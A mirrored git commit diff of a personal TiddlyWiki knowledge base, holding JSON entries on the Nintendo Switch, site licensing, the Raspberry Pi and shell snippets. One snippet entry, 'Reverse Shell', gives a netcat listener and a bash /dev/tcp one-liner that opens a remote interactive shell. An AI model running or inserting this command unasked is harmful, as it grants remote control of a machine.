mirror of
https://gitlab.com/octtspacc/OcttKB
synced 2025-03-06 19:57:49 +01:00
Saved by TiddlyWiki
This commit is contained in:
parent
35642057ec
commit
904a3043ed
@ -254,7 +254,7 @@ Error message and password prompt
|
||||
{"created":"20220925130302833","text":"''Nintendo Switch'' is a family of portable game consoles created by [[Nintendo|Nintendo:en]].\n\n[img[https://i.ytimg.com/vi_webp/Cb-srOfRqNc/maxresdefault.webp]]\n\nThe console's introduction was hyped due to it being the first ever Nintendo console to be created with both home and portable use in mind. The name itself comes from the fact that the console can //switch//, from being connected to a TV to being able to be used standalone.","tags":"Nintendo Gaming NX i18n:en","title":"Nintendo Switch:en","modified":"20220926115015739"},
|
||||
{"created":"20220924173239034","text":"All my //original content// on this website, unless where otherwise specified, is licensed under [[CC BY-SA 4.0|CC BY-SA 4.0:en]].\n\nIt is a [[free culture]] license that promotes the benefits of making information available for anyone to learn from and build upon. However, be sure to know its terms before doing anything other than just consuming the site!\n\nYou can easily recognize which of the directly hosted (entirely contained in a //tiddler// itself, like text or string-encoded files) content is my original creation: it's anything that features no indication of source or license.\n\nUnless I forget to do so in specific instances, I always credit the source and/or specify the original license for anything upon which I don't hold 100% of the rights (even public domain content) and is a straight copy. I may not do so if the content in question is not directly copied //into// my site, but instead embedded from a Web space which is the property of another entity - in which case, you can click the pencil (edit) button to read the source code for a specific //tiddler//, to discover possible external embed URLs.\n\nThe above is valid for all //content tiddlers// (those whose name does not start with `$:/`) and all //system tiddlers// created by me (not part of standard [[TiddlyWiki|TiddlyWiki:en]] or any of my [[installed plugins|$:/core/ui/ControlPanel/Plugins]]).\n\n//Non-original system tiddlers// which I never touched, obviously fall under their own license; but, for simplicity of operations, as well as to avoid accidentally claiming ownership on code not written by me, I give away my copyright for //non-original system tiddlers// that I modified from their original state. This means you can consider those as always falling under their original license, even if I touched them.","tags":"i18n:en","title":"OcttKB/Licensing","modified":"20220926115015930"},
|
||||
{"created":"20220922200129612","text":"\u003C\u003Ci18n>>\n\nIl ''Rasperino'' (''Raspberry Pi'') è il Single-Board-Computer più epico mai creato.\n\n[img[https://assets.raspberrypi.com/static/raspberry-pi-4-labelled-f5e5dcdf6a34223235f83261fa42d1e8.png]]\n\nPiù informazioni al suo riguardo sono disponibili sul sito ufficiale: [[https://www.raspberrypi.com]].\n\nSotto lo stesso nome di Raspberry Pi, la Raspberry Foundation crea anche dei microcontrollori, oltre che dei computer completi.","tags":"Raspberry i18n:it","title":"Rasperry Pi:it","modified":"20220926123849480","i18n":"RasperryPi"},
|
||||
{"created":"20220926095309988","text":"0. Run on master (requires netcat):\n\n```sh\nnc -l -vv -p 1337\n```\n\n1. Run on slave:\n\n```sh\nbash -i &> /dev/tcp/$ADDRESS/$PORT 0>&1\n```","tags":"Snippets","title":"Reverse Shell","modified":"20220927130544066"},
|
||||
{"created":"20220926095309988","text":"0. Run on master (requires netcat):\n\n```sh\nnc -l -vv -p $PORT\n```\n\n1. Run on slave:\n\n```sh\nbash -i &> /dev/tcp/$ADDRESS/$PORT 0>&1\n```","tags":"Snippets","title":"Reverse Shell","modified":"20220927130559929"},
|
||||
{"created":"20220924130815541","text":"```sh\nfind ./ -type f -exec sed -i \"s/Old/New/g\" {} \\;\n```","tags":"Snippets i18n:en","title":"sed for all files in all subdirectories","modified":"20220926115016026"},
|
||||
{"created":"20220922163220116","text":"\u003Cstyle>\ntr:nth-child(even) {background-color: #f2f2f2;}\n\u003C/style>","tags":"Snippets TiddlyWiki","title":"Snippets to Test for TiddlyWiki","modified":"20220922163255515"},
|
||||
{"created":"20220920160642961","text":"!!! Global Macros\n* [[$:/Macros]]\n* ~$:/Macros/*\n\n!!! Theming\n* [[$:/palettes/Octt Light]]\n\n!!! Modified system files\n* $:/StaticBanner\n* [[$:/core/templates/static.content]]\n* [[$:/core/templates/exporters/StaticRiver]]","tags":"TiddlyWiki i18n:en","title":"TiddlyWiki Hacks","modified":"20220926115012258"},
|
||||
|
Loading…
x
Reference in New Issue
Block a user